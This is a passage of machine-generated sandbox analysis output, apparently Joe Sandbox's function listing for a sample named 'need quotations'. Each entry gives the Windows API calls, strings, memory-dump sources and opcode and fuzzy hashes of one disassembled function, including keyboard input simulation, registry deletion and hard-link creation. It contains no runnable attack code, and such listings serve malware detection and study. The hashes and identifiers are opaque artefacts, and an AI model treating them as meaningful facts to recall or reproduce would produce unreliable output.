Function 0026235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00262276), ref: 00262376
GetProcAddress.KERNEL32(00000000), ref: 0026237D

Strings

combase.dll, xrefs: 00262371
RoUninitialize, xrefs: 00262365

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 956bc7b72621350f3b2ec2af19c3692f4f5227ce5d3ca0a93f6db06d905a3703
Instruction ID: c6d8ef80296895bb1168e6d92b08c8288494ebf6a4ddcdc24a248ff4571c33a8
Opcode Fuzzy Hash: 956bc7b72621350f3b2ec2af19c3692f4f5227ce5d3ca0a93f6db06d905a3703
Instruction Fuzzy Hash: 94E0ECB8556301EFDB2A5F61FD1EF143A68B704B02F104479F60DE25B0CBB95464CB15

Function 002BAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 002BAC60
__swprintf.LIBCMT ref: 002BAC94

Strings

WIN_XPe, xrefs: 002BACD3
%.3d, xrefs: 002BAC6E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 1987414da9da413f0df6bd8374cc1b43460e69eb715a752e28a1fa1a8c543a89
Instruction ID: a30dfa29536cca1101a4e0425f8143025da7ffa1fa9a955d3ffc8c39bbdbae1b
Opcode Fuzzy Hash: 1987414da9da413f0df6bd8374cc1b43460e69eb715a752e28a1fa1a8c543a89
Instruction Fuzzy Hash: 23E0EC7183461C9BCA1197509D45DFAB77CA704781F5400A3B906A1010E6B5ABB4AA22

Function 002A2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,002A21FB,?,002A23EF), ref: 002A2213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 002A2225

Strings

GetProcessId, xrefs: 002A221F
kernel32.dll, xrefs: 002A220E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 9063436457c90fd0c01a7f9ed889fce4a96ff6b98d98676d3507927e8bfa03ff
Instruction ID: d88de2a0145a381faa872d495e51d765abc99c16e6fd4746a3ab3b3318827ef6
Opcode Fuzzy Hash: 9063436457c90fd0c01a7f9ed889fce4a96ff6b98d98676d3507927e8bfa03ff
Instruction Fuzzy Hash: 6BD05E34820717DFE7215F24B808A12B6D8AB06300B144439EC45A2150DAB0D8988750

Function 002442F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,002442EC,?,002442AA,?), ref: 00244304
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00244316

Strings

kernel32.dll, xrefs: 002442FF
Wow64RevertWow64FsRedirection, xrefs: 00244310

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 3fbedd6d0c7897f47ef7ff6456b0460a260abcb37f1275a09bb4fddb6d9071f0
Instruction ID: 23e469caf793c5cacf277f442d04c4d3e0a5926476bb26a7eaf5817de324079d
Opcode Fuzzy Hash: 3fbedd6d0c7897f47ef7ff6456b0460a260abcb37f1275a09bb4fddb6d9071f0
Instruction Fuzzy Hash: BCD0A7308607139FC7255F20FC0CB11BAD4AF05701B244479F545D2160D7F0C894C610

Function 0024434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,002441BB,00244341,?,0024422F,?,002441BB,?,?,?,?,002439FE,?,00000001), ref: 00244359
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0024436B

Strings

Wow64DisableWow64FsRedirection, xrefs: 00244365
kernel32.dll, xrefs: 00244354

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 26ef135e1bd4dd5a2da99c94b0756d5d35aaf3b0c14b5b6c892740bc1db7eab1
Instruction ID: b77baabf8385f787efd6224b413744094b803e81f4529f2ab2659d9b03ef1903
Opcode Fuzzy Hash: 26ef135e1bd4dd5a2da99c94b0756d5d35aaf3b0c14b5b6c892740bc1db7eab1
Instruction Fuzzy Hash: 5AD0A730860B139FC7245F30FC0DF11BAD4AF11B15B24C479E485D2150D7F0D894C610

Function 00280539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,?,0028051D,?,002805FE), ref: 00280547
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00280559

Strings

RegisterTypeLibForUser, xrefs: 00280553
oleaut32.dll, xrefs: 00280542

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 340455e0ae0c3a63e3830874aa20b7a862e77476abf0b4b32e6525e45f82bb8e
Instruction ID: 95f03266a7596d0772d7864cbbec713b41798c17cde89a0abb999150cf4d0c6a
Opcode Fuzzy Hash: 340455e0ae0c3a63e3830874aa20b7a862e77476abf0b4b32e6525e45f82bb8e
Instruction Fuzzy Hash: EBD05E344707139EC7209F60AC48A11B7A4AB02301B548439E45A92591D6B4C8988B20

Function 00280564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0028052F,?,002806D7), ref: 00280572
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00280584

Strings

UnRegisterTypeLibForUser, xrefs: 0028057E
oleaut32.dll, xrefs: 0028056D

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: 81beb7444584253753cd17cbd7285b8008f373b86a8fed65db74576d1b50fb35
Instruction ID: 764ffe05afab3ccf3cc1a29c03f7fbfa05687d5d114cfb88a432294d4acaab82
Opcode Fuzzy Hash: 81beb7444584253753cd17cbd7285b8008f373b86a8fed65db74576d1b50fb35
Instruction Fuzzy Hash: 3DD05E344213179EC7206F20A848A12B7E4AB06300B548539E94592994D6B4C4988B20

Function 0029ECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0029ECBE,?,0029EBBB), ref: 0029ECD6
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0029ECE8

Strings

GetSystemWow64DirectoryW, xrefs: 0029ECE2
kernel32.dll, xrefs: 0029ECD1

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: d30e17b973778a8e7d235e089edcd0665a6acc6b037954bf9e61fe32e7f4f663
Instruction ID: 7a84b9f36b8b688f98437bc6add674be6702186784fbe144555fc4589def666b
Opcode Fuzzy Hash: d30e17b973778a8e7d235e089edcd0665a6acc6b037954bf9e61fe32e7f4f663
Instruction Fuzzy Hash: 7AD0A7308207239FCF209F60FC4CA12B6E4AF01340B15883AF889D2150DBF0D894C610

Function 0029BADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,0029BAD3,00000001,0029B6EE,?,002DDC00), ref: 0029BAEB
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0029BAFD

Strings

GetModuleHandleExW, xrefs: 0029BAF7
kernel32.dll, xrefs: 0029BAE6

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: b1559dc0da3b30a3bf642f36d3af8d583a6661b1ac4d49fea62ae2eb6c832e0c
Instruction ID: 985dd563872079ae9877e24f7cccd042aa9da965e37f60f82a58d9d96f6dcb4c
Opcode Fuzzy Hash: b1559dc0da3b30a3bf642f36d3af8d583a6661b1ac4d49fea62ae2eb6c832e0c
Instruction Fuzzy Hash: 13D05E308207139FCB315F20B848A22B6D4AB01344B144439A947D2194EBB0D894C610

Function 002A3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,002A3BD1,?,002A3E06), ref: 002A3BE9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002A3BFB

Strings

RegDeleteKeyExW, xrefs: 002A3BF5
advapi32.dll, xrefs: 002A3BE4

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 24601b00d50372500f942924cc1ba1437a3752a02bfe6dfc4154e5df0eb3cf96
Instruction ID: ec1531143f7ee5bdb97597cb2d85c86f2ce7a0a195e2ea52a173bb16143f538d
Opcode Fuzzy Hash: 24601b00d50372500f942924cc1ba1437a3752a02bfe6dfc4154e5df0eb3cf96
Instruction Fuzzy Hash: 58D05E704207169FC720AF60AC09A13BAB8AB03324B14443AE449E2150DAF0C4908A10

Function 00279B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2d3534e2d32965dda3afdf6e63e859153e3e3ef49040f60576c77564ab30536
Instruction ID: 81449d0c556e4fae05473847d13da75b4b6d86eb5ce32558a6011351e30023c5
Opcode Fuzzy Hash: e2d3534e2d32965dda3afdf6e63e859153e3e3ef49040f60576c77564ab30536
Instruction Fuzzy Hash: 33C16B75A2021AEFDF14DF94C884EAEB7B5FF48700F108599E909AB251D770EE91CB90

Function 0029AA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0029AAB4
CoUninitialize.OLE32 ref: 0029AABF

Part of subcall function 00280213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0028027B

VariantInit.OLEAUT32(?), ref: 0029AACA
VariantClear.OLEAUT32(?), ref: 0029AD9D

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 7f7969207ec66d752c6511dd982296da4eafd04b45c99ccc3d826aaf3c593255
Instruction ID: 507bec27b9c01e120832dcd87b009c5e8b80acb17900dbc1fe97efc6944319c3
Opcode Fuzzy Hash: 7f7969207ec66d752c6511dd982296da4eafd04b45c99ccc3d826aaf3c593255
Instruction Fuzzy Hash: D9A169352247019FDB14EF14C491B1AB7E4BF89B10F148449FA9A9B3A2CB70ED64CF96

Function 002791CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002791DD
SysAllocString.OLEAUT32(?), ref: 00279286
VariantCopy.OLEAUT32 ref: 002792B5
VariantClear.OLEAUT32(?), ref: 002792DC

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 46adff21e504915e810627230cccaa46bf3a4faf4e8245dc71cf3d80091f5bb6
Instruction ID: c691aa20eb1998c2a8436b31400f9c2cfde77e4f839cdd7ed55c36c594fcc79e
Opcode Fuzzy Hash: 46adff21e504915e810627230cccaa46bf3a4faf4e8245dc71cf3d80091f5bb6
Instruction Fuzzy Hash: 265171346347069BDB24AF69D495B2EB3A9EF45314F20C85FE54ECB2D1DB7098E08B05

Function 0026365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 002636B7
_memcpy_s.LIBCMT ref: 00263729
__filbuf.LIBCMT ref: 002637AA
_memset.LIBCMT ref: 002637EE

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction ID: 4815de4d5a6f7a3e1f8e451bb44c09def84d22bffa1aa2b57a6c31a680500bd1
Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
Instruction Fuzzy Hash: A651A7B4A20206ABDB25CF69C88466EB7A5AF40320F248729F835972D0D7719FF09F54

Function 002AC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(017087E8,?), ref: 002AC544
ScreenToClient.USER32(?,00000002), ref: 002AC574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 002AC5DA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: f3b6f3a556ec1c7c5abbc38d2655afdbdbe17fd687ebd589aec706d2f0db9938
Instruction ID: 138ca60691b66aae3e56cfaaf28b4b7466908f0479977c7e9fe4d6875669e780
Opcode Fuzzy Hash: f3b6f3a556ec1c7c5abbc38d2655afdbdbe17fd687ebd589aec706d2f0db9938
Instruction Fuzzy Hash: 4E516175910209EFCF10DF68D8809AE7BB9FF56720F608259F965AB290DB30ED51CB90

Function 0027C410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0027C462
__itow.LIBCMT ref: 0027C49C

Part of subcall function 0027C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0027C753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 0027C505
__itow.LIBCMT ref: 0027C55A

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 714261ede299a2371c57731dc27b1e68897c165453b6b5bda97453fbbba40273
Instruction ID: 22140f216246299aefcd7796dd0d70b29d791a8022ea68be8938cadd9d34972e
Opcode Fuzzy Hash: 714261ede299a2371c57731dc27b1e68897c165453b6b5bda97453fbbba40273
Instruction Fuzzy Hash: 5041F771A10209AFDF25DF64C851FEE7BB9AF49700F104029FA09B3282DB709A65CF91

Function 0028390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00283966
SetKeyboardState.USER32(00000080,?,00000001), ref: 00283982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 002839EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00283A4D

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: df762851d84949b86bde27e395bc96d3085288c4695dc90c88386916204d599e
Instruction ID: 023f66c607739f6dadd63238d8be84704a056b6528bd5e192cebbe509317bbb3
Opcode Fuzzy Hash: df762851d84949b86bde27e395bc96d3085288c4695dc90c88386916204d599e
Instruction Fuzzy Hash: 63412C78A26248AEEF34EF64C809BFDBBB5AB45710F04011AF4C1921C1C7F49EA5DB65

Function 0028E698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0028E742
GetLastError.KERNEL32(?,00000000), ref: 0028E768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0028E78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0028E7B9

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 969afe24d975a8c89cb3d6612732b27a3cc03306132cb127218f4b058b586144
Instruction ID: 7e37349e7b3b56a9976078b5ba57f6fd4451aeaee528eaab85c6d71e2e4bd415
Opcode Fuzzy Hash: 969afe24d975a8c89cb3d6612732b27a3cc03306132cb127218f4b058b586144
Instruction Fuzzy Hash: 8A412339210611DFCF15EF14C444A4EBBE5BF9AB20B098498E946AB3A2CB70FD50CF95

Function 002AB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

